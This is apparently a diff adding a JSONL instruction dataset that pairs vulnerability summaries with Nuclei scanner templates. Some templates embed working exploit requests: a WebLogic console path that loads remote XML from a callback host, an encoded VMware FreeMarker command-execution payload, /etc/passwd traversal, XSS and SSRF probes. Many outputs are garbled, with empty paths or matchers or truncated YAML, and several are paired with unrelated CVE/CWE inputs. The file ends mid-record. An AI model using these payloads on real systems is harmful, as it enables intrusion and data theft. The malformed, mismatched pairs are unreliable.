+{"instruction": "Generate a Nuclei template to detect Improper Neutralization of Special Elements Used in a Template Engine", "input": "Title: Improper Neutralization of Special Elements Used in a Template Engine (CWE-1336)\nSummary: The product uses a template engine to insert or process externally-influenced input, but it does not neutralize or incorrectly neutralizes special elements or syntax that can be interpreted as template expressions or other code directives when processed by the engine. Many web applications use template engines that allow developers to insert externally-influenced values into free text or messages in order to generate a full web page, document, message, etc. Such engines include Twig, Jinja2, Pug\nVulnerability Type: Improper Neutralization of Special Elements Used in a Template Engine\nSeverity: high\nIndicators: error", "output": "id: pdf-signer-ssti-to-rce\n\ninfo:\n name: PDF Signer 3.0 - Template Injection\n author: madrobot\n severity: critical\n description: PDF Signer 3.0 is susceptible to a template injection which allows code execution, due to improper cookie handling and an improper CSRF implementation. An attacker can execute code on the server in the context of the web server.\n tags: ssti,rce,csrf,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: regex\n part: body", "category": "cwe", "severity": "high", "id": "CWE-1336"}
+{"instruction": "Generate a Nuclei template for CVE-2017-9805", "input": "Title: Deserialization of Untrusted Data in apache struts and others\nSummary: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.\nVulnerability Type: Deserialization of Untrusted Data\nSeverity: high\nAffected Products: apache struts, cisco digital_media_manager, cisco hosted_collaboration_solution\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-9805\n\ninfo:\n name: Apache Struts2 S2-052 - Remote Code Execution\n author: pikpikcu\n severity: high\n description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads.\n tags: cve,cve2017,apache,rce,struts,kev,vkev,vuln\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/struts2-rest-showcase/orders/3\" \n - \"{{BaseURL}}/orders/3\" \n matchers:\n - type: word\n words:\n - \"Debugging information\" \n - \"com.thoughtworks.xstream.converters.collections.MapConverter\" \n condition: and\n - type: status\n status:\n - 500", "category": "cve", "severity": "high", "id": "CVE-2017-9805"}
+{"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: processmaker-lfi\n\ninfo:\n name: ProcessMaker <=3.5.4 - Local File Inclusion\n author: KrE80r\n severity: high\n description: ProcessMaker 3.5.4 and prior is vulnerable to local file inclusion.\n tags: processmaker,lfi,edb,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"ProcessMaker\" \n - \"processmaker_login.png\" \n part: body\n condition: and\n - method: GET\n path:\n matchers:\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-22"}
+{"instruction": "Generate a Nuclei template for: PlantUMLServer - Detect", "input": "Title: PlantUMLServer - Detect\nSummary: PlantUMLServer - Detect. PlantUMLServer is an open-source web application that renders UML diagrams from textual descriptions. It provides a web interface for the PlantUML diagram generation tool, allowing users to create various types of diagrams including class diagrams, sequence diagrams, and activity diagrams through a simple markup language.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: plantumlserver-detect\n\ninfo:\n name: PlantUMLServer - Detect\n author: s4e-io\n severity: info\n description: PlantUMLServer is an open-source web application that renders UML diagrams from textual descriptions. It provides a web interface for the PlantUML diagram generation tool, allowing users to create various types of diagrams including class diagrams, sequence diagrams, and activity diagrams through a simple markup language.\n tags: tech,uml,plantuml,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl", "category": "generic", "severity": "info", "id": "plantumlserver-detect"}
+{"instruction": "Generate a Nuclei template for CVE-2023-27163", "input": "Title: Vulnerability (CWE-918) in rbaskets request_baskets\nSummary: request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: medium\nAffected Products: rbaskets request_baskets\nIndicators: error, vulnerability detected", "output": "id: request-baskets-exposure\n\ninfo:\n name: Request Baskets - Exposure\n author: DhiyaneshDk\n severity: low\n description: Request Baskets is exposed.\n tags: misconfig,requests-baskets,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/web\" \n matchers:\n - type: word\n words:\n - \"Request Baskets\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-27163"}
+{"instruction": "Generate a Nuclei template for: Custom Fonts \u2013 Host Your Fonts Locally Detection", "input": "Title: Custom Fonts \u2013 Host Your Fonts Locally Detection\nSummary: Custom Fonts \u2013 Host Your Fonts Locally Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-custom-fonts\n\ninfo:\n name: Custom Fonts \u2013 Host Your Fonts Locally Detection\n author: ricardomaia\n severity: info\n description: Custom Fonts \u2013 Host Your Fonts Locally Detection\n tags: tech,wordpress,wp-plugin,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/custom-fonts/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-custom-fonts"}
+{"instruction": "Generate a Nuclei template for: Feiyuxing Information - Exposure", "input": "Title: Feiyuxing Information - Exposure\nSummary: Feiyuxing Information - Exposure. Feiyuxing enterprise-level intelligent online behavior management system has authority bypass and information leakage vulnerabilities, which can obtain administrator rights and user passwords\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: feiyuxing-info-leak\n\ninfo:\n name: Feiyuxing Information - Exposure\n author: SleepingBag945\n severity: high\n description: Feiyuxing enterprise-level intelligent online behavior management system has authority bypass and information leakage vulnerabilities, which can obtain administrator rights and user passwords\n tags: misconfig,exposure,iot,wpa,wpa2,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/request_para.cgi?parameter=wifi_get_5g_host\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "feiyuxing-info-leak"}
+{"instruction": "Generate a Nuclei template for: OpenEdge Login Panel - Detect", "input": "Title: OpenEdge Login Panel - Detect\nSummary: OpenEdge Login Panel - Detect. An OpenEdge login panel was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: openedge-panel\n\ninfo:\n name: OpenEdge Login Panel - Detect\n author: rxerium\n severity: info\n description: An OpenEdge login panel was detected.\n tags: panel,openedge,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Welcome to Progress Application Server for OpenEdge\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "openedge-panel"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: mixi\n\ninfo:\n name: Mixi User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Mixi user name information check was conducted.\n tags: osint,osint-social,mixi,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://mixi.jp/view_community.pl?id={{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"| mixi\u30b3\u30df\u30e5\u30cb\u30c6\u30a3\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for CVE-2023-1454", "input": "Title: SQL Injection in jeecg jeecg-boot\nSummary: A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223299.\nVulnerability Type: SQL Injection\nSeverity: medium\nAffected Products: jeecg jeecg-boot\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-1454\n\ninfo:\n name: Jeecg-boot 3.5.0 qurestSql - SQL Injection\n author: DhiyaneshDK\n severity: critical\n description: A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.\n tags: cve2023,cve,jeecg,sqli,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"SQLException\" \n - \"XPATH syntax error:\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-1454"}
+{"instruction": "Generate a Nuclei template for: Zimbra Security Checks", "input": "Title: Zimbra Security Checks\nSummary: Zimbra Security Checks. A simple workflow that runs all Zimbra related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: zimbra-workflow\n\ninfo:\n name: Zimbra Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all Zimbra related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "zimbra-workflow"}
+{"instruction": "Generate a Nuclei template for CVE-2024-48455", "input": "Title: Unknown Vulnerability in CVE-2024-48455\nSummary: An issue in Netis Wifi6 Router NX10 2.0.1.3643 and 2.0.1.3582 and Netis Wifi 11AC Router NC65 3.0.0.3749 and Netis Wifi 11AC Router NC63 3.0.0.3327 and 3.0.0.3503 and Netis Wifi 11AC Router NC21 3.0.0.3800, 3.0.0.3500 and 3.0.0.3329 and Netis Wifi Router MW5360 1.0.1.3442 and 1.0.1.3031 allows a remote attacker to obtain sensitive information via the mode_name, wl_link parameters of the skk_get.cgi component.\nVulnerability Type: Unknown Vulnerability\nSeverity: low\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-48455\n\ninfo:\n name: Netis Wifi Router - Information Disclosure\n author: s4e-io\n severity: high\n description: An issue in Netis Wifi6 Router NX10 2.0.1.3643 and 2.0.1.3582 and Netis Wifi 11AC Router NC65 3.0.0.3749 and Netis Wifi 11AC Router NC63 3.0.0.3327 and 3.0.0.3503 and Netis Wifi 11AC Router NC21 3.0.0.3800, 3.0.0.3500 and 3.0.0.3329 and Netis Wifi Router MW5360 1.0.1.3442 and 1.0.1.3031 allows a remote attacker to obtain sensitive information via the mode_name, wl_link parameters of the skk_get.cgi component.\n tags: netis,router,exposure,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "low", "id": "CVE-2024-48455"}
+{"instruction": "Generate a Nuclei template for CVE-2014-100004", "input": "Title: Cross-Site Scripting (XSS) in sitecore cms\nSummary: Cross-site scripting (XSS) vulnerability in Sitecore CMS before 7.0 Update-4 (rev. 140120) allows remote attackers to inject arbitrary web script or HTML via the xmlcontrol parameter to the default URI. NOTE: some of these details are obtained from third party information.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: sitecore cms\nIndicators: error, vulnerability detected", "output": "id: CVE-2014-100004\n\ninfo:\n name: Sitecore CMS - Cross-Site Scripting\n author: DhiyaneshDK\n severity: medium\n description: Sitecore CMS contains a cross-site scripting vulnerability via the \"special way\" of displaying XML Controls directly, which allows for a Cross Site Scripting Attack.\n tags: cve,cve2014,xss,sitecore,cms,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?xmlcontrol=body%20onload=alert(document.domain)\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2014-100004"}
+{"instruction": "Generate a Nuclei template for: Easypost API Token", "input": "Title: Easypost API Token\nSummary: Easypost API Token. Tags: easypost, exposure, tokens\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: easypost-token\n\ninfo:\n name: Easypost API Token\n author: DhiyaneshDK\n severity: info\n description: Easypost API Token\n tags: easypost,exposure,tokens,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "easypost-token"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: ruijie-information-disclosure\n\ninfo:\n name: Ruijie Login Panel - Detect\n author: pikpikcu\n severity: high\n description: Ruijie login panel was detected and leaks authentication credentials.\n tags: ruijie,config,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login.php\" \n matchers:\n - type: regex\n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: vero\n\ninfo:\n name: Vero User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Vero user name information check was conducted.\n tags: osint,osint-art,vero,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://vero.co/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"on VERO\u2122\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for: Seagate NAS Login - Detect", "input": "Title: Seagate NAS Login - Detect\nSummary: Seagate NAS Login - Detect. Seagate NAS - SEAGATE Login was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: seagate-nas-login\n\ninfo:\n name: Seagate NAS Login - Detect\n author: JustaAcat\n severity: info\n description: Seagate NAS - SEAGATE Login was detected.\n tags: panel,seagate,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Seagate NAS - SEAGATE\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "seagate-nas-login"}
+{"instruction": "Generate a Nuclei template for CVE-2020-14882", "input": "Title: Unknown Vulnerability in oracle weblogic_server\nSummary: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\nVulnerability Type: Unknown Vulnerability\nSeverity: critical\nAffected Products: oracle weblogic_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-14882\n\ninfo:\n name: Oracle Weblogic Server - Remote Command Execution\n author: dwisiswant0\n severity: critical\n description: Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server.\n tags: cve2020,cve,oracle,rce,weblogic,oast,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')\" \n matchers:\n - type: word\n words:\n - \"ADMINCONSOLESESSION\" \n part: header\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol", "category": "cve", "severity": "critical", "id": "CVE-2020-14882"}
+{"instruction": "Generate a Nuclei template for: Erlang/OTP SSH Server - Detect", "input": "Title: Erlang/OTP SSH Server - Detect\nSummary: Erlang/OTP SSH Server - Detect. Detects Erlang/OTP SSH servers and parses the version number from the banner.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: erlang-otp-ssh-detect\n\ninfo:\n name: Erlang/OTP SSH Server - Detect\n author: darses\n severity: info\n description: Detects Erlang/OTP SSH servers and parses the version number from the banner.\n tags: network,ssh,erlang,detect,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "erlang-otp-ssh-detect"}
+{"instruction": "Generate a Nuclei template for CVE-2022-45805", "input": "Title: SQL Injection in paytm payment_gateway\nSummary: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Paytm Paytm Payment Gateway paytm-payments allows SQL Injection.This issue affects Paytm Payment Gateway: from n/a through 2.7.3.\n\n\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: paytm payment_gateway\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-45805\n\ninfo:\n name: WordPress Paytm Payment Gateway <=2.7.3 - SQL Injection\n author: theamanrawat\n severity: critical\n description: WordPress Paytm Payment Gateway plugin through 2.7.3 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,paytm-payments,authenticated,paytm,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2022-45805"}
+{"instruction": "Generate a Nuclei template for CVE-2022-22954", "input": "Title: Code Injection in vmware identity_manager and others\nSummary: VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.\nVulnerability Type: Code Injection\nSeverity: critical\nAffected Products: vmware identity_manager, vmware vrealize_automation, vmware workspace_one_access\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-22954\n\ninfo:\n name: VMware Workspace ONE Access - Server-Side Template Injection\n author: sherlocksecurity\n severity: critical\n description: VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.\n tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d\" \n matchers:\n - type: word\n words:\n - \"Authorization context is not valid\" \n part: body\n - type: status\n status:\n - 400", "category": "cve", "severity": "critical", "id": "CVE-2022-22954"}
+{"instruction": "Generate a Nuclei template for: Pritunl - Panel", "input": "Title: Pritunl - Panel\nSummary: Pritunl - Panel. Realtime website and application monitoring tool\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: pritunl-panel\n\ninfo:\n name: Pritunl - Panel\n author: irshad ahamed\n severity: info\n description: Realtime website and application monitoring tool\n tags: pritunl,panel,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login\" \n matchers:\n - type: word\n words:\n - \"Pritunl\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "pritunl-panel"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: armorgames\n\ninfo:\n name: ArmorGames User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: ArmorGames user name information check was conducted.\n tags: osint,osint-gaming,armorgames,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://armorgames.com/user/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"about\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for: WS FTP File Disclosure", "input": "Title: WS FTP File Disclosure\nSummary: WS FTP File Disclosure. WS_FTP software, which is a popular FTP (File Transfer Protocol) client used for transferring files between a local computer and a remote server has its log file exposed.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: ws-ftp-log\n\ninfo:\n name: WS FTP File Disclosure\n author: Hardik-Solanki\n severity: low\n description: WS_FTP software, which is a popular FTP (File Transfer Protocol) client used for transferring files between a local computer and a remote server has its log file exposed.\n tags: exposure,ftp,logs,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ws_ftp.log\" \n - \"{{BaseURL}}/WS_FTP.LOG\" \n matchers:\n - type: regex\n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "ws-ftp-log"}
+{"instruction": "Generate a Nuclei template for CVE-2025-5605", "input": "Title: Vulnerability (CWE-290) in CVE-2025-5605\nSummary: An authentication bypass vulnerability exists in the Management Console of multiple WSO2 products. A malicious actor with access to the console can manipulate the request URI to bypass authentication and access certain restricted resources, resulting in partial information disclosure.\n\nThe known exposure from this issue is limited to memory statistics. While the vulnerability does not allow full account compromise, it still enables unauthorized access to internal system details.\nVulnerability Type: Vulnerability (CWE-290)\nSeverity: medium\nIndicators: unauthorized", "output": "id: CVE-2025-5605\n\ninfo:\n name: WSO2 Management Console - Authentication Bypass\n author: DhiyaneshDK\n severity: medium\n description: An authentication bypass vulnerability exists in the Management Console of multiple WSO2 products. A malicious actor with access to the console can manipulate the request URI to bypass authentication and access certain restricted resources, resulting in partial information disclosure. The known exposure from this issue is limited to memory statistics. While the vulnerability does not allow full account compromise, it still enables unauthorized access to internal system details.\n tags: cve,cve2025,wso2,auth-bypass\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Memory Statistics\" \n - \"Collection Usage\" \n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2025-5605"}
+{"instruction": "Generate a Nuclei template for CVE-2022-43140", "input": "Title: Vulnerability (CWE-918) in keking kkfileview\nSummary: kkFileView v4.1.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. This vulnerability allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the url parameter.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: high\nAffected Products: keking kkfileview\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-43140\n\ninfo:\n name: kkFileView 4.1.0 - Server-Side Request Forgery\n author: Co5mos\n severity: high\n description: kkFileView 4.1.0 is susceptible to server-side request forgery via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. An attacker can force the application to make arbitrary requests via injection of crafted URLs into the url parameter and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n tags: cve2022,cve,ssrf,kkFileview,keking,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}\" \n matchers:\n - type: word\n words:\n - \"
Interactsh Server
\" \n part: body", "category": "cve", "severity": "high", "id": "CVE-2022-43140"}
+{"instruction": "Generate a Nuclei template for: Private Service Connect Endpoints Not Configured", "input": "Title: Private Service Connect Endpoints Not Configured\nSummary: Private Service Connect Endpoints Not Configured. Ensure that Private Service Connect (PSC) endpoints are configured for your Virtual Private Cloud (VPC) networks. Private Service Connect creates a secure, private tunnel between your VPC network and Google's services (or your own services in another VPC) so traffic never touches the public internet. This enhances security and avoids complexities of managing public connections.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-vpc-private-service-connect\n\ninfo:\n name: Private Service Connect Endpoints Not Configured\n author: princechaddha\n severity: medium\n description: Ensure that Private Service Connect (PSC) endpoints are configured for your Virtual Private Cloud (VPC) networks. Private Service Connect creates a secure, private tunnel between your VPC network and Google's services (or your own services in another VPC) so traffic never touches the public internet. This enhances security and avoids complexities of managing public connections.\n tags: cloud,devops,gcp,gcloud,vpc,networking,security,psc,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-vpc-private-service-connect"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: giters\n\ninfo:\n name: Giters User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Giters user name information check was conducted.\n tags: osint,osint-coding,giters,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://giters.com/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \" - Giters\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for CVE-2023-23063", "input": "Title: Path Traversal in cellinx nvt_web_server\nSummary: Cellinx NVT v1.0.6.002b was discovered to contain a local file disclosure vulnerability via the component /cgi-bin/GetFileContent.cgi.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: cellinx nvt_web_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-23063\n\ninfo:\n name: Cellinx NVT Web Server - Local File Disclosure\n author: daffainfo\n severity: high\n description: Cellinx NVT v1.0.6.002b was discovered to contain a local file disclosure vulnerability via the component /cgi-bin/GetFileContent.cgi.\n tags: cve,cve2023,cellinx,lfi,nvt,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2023-23063"}
+{"instruction": "Generate a Nuclei template for CVE-2022-40684", "input": "Title: Authentication Bypass in fortinet fortiproxy and others\nSummary: An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.\nVulnerability Type: Authentication Bypass\nSeverity: critical\nAffected Products: fortinet fortiproxy, fortinet fortiswitchmanager, fortinet fortios\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-40684\n\ninfo:\n name: Fortinet - Authentication Bypass\n author: Shockwave,nagli,carlosvieira\n severity: critical\n description: Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev,intrusive,vkev,vuln\n\nhttp:\n - method: 